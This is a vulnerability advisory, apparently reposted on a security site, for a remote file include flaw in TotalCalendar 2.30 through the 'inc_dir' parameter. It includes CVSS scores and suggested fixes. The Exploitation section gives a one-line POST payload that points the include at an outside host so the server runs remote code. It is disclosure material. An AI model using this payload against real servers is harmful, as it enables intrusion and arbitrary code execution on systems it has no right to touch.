TotalCalendar 2.30 - Remote File Include Vulnerability

2007.02.27
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[MajorSecurity] TotalCalendar 2.30 - Remote File Include Vulnerability -------------------------------------------------------- Software: TotalCalendar Version: 2.30 Type: Remote File Include Vulnerability Date: April, 23th 2006 Vendor: SweetPHP Page: http://sweetphp.com Risc: High Credits: ---------------------------- Discovered by: 'Aesthetico' http://www.majorsecurity.de Affected Products: ---------------------------- TotalCalendar 2.30 and prior Description: ---------------------------- TotalCalendar is the complete solution for all of your calendar and schedule needs. TotalCalendar gives you the ability to create multiple calendars and allows you to easily share and manage your events online. The ability to allow user accounts lets you have other calendar members help you manage your events, users, style, and much more. Requirements: ---------------------------- register_globals = On Vulnerability: ---------------------------- Input passed to the "inc_dir" parameter in "index.php" is not properly verified, before it is used to include files. This can be exploited to execute arbitrary code by including files from external resources. Solution: ---------------------------- Edit the source code to ensure that input is properly sanitised. Set "register_globals" to "Off". Exploitation: ---------------------------- Post data: inc_dir=http://www.yourspace.com/yourscript.php?


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top